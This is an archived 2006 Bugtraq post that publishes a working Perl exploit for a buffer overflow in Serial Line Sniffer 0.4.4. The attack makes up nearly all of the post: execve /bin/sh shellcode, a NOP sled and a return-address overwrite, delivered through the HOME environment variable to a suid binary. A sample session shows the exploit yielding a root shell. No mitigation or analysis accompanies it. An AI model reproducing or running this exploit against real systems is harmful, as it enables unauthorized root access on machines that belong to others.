lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060111062256.20464.qmail@securityfocus.com>
Date: 11 Jan 2006 06:22:56 -0000
From: Sintigan@...llcoders.com
To: bugtraq@...urityfocus.com
Subject: Serial Line Sniffer 0.4.4 Buffer Overflow


Original can be found at http://shellcoders.com/sintigan/slsnif-ploit.pl

# Author: Sintigan@...llcoders.com
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
#
# sintigan@...night:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
#
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot
#

 #!/usr/bin/perl
 $shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

 $buf = 288;
 $ret = 0xbffff3a0;
 $nop = "\x90";
 $offset = -250; 	 

 if (@ARGV == 1) { $offset = $ARGV[0]; }

 for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
  $buffer .= $nop;
 }

 $buffer .= $shellcode;
 $addr = pack('l', ($ret + $offset));
 for ($i += length($shellcode); $i < $buf; $i += 4) {
  $buffer .= $addr;
 }
 $ENV{'HOME'} = $buffer; exec("/usr/local/bin/slsnif");


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ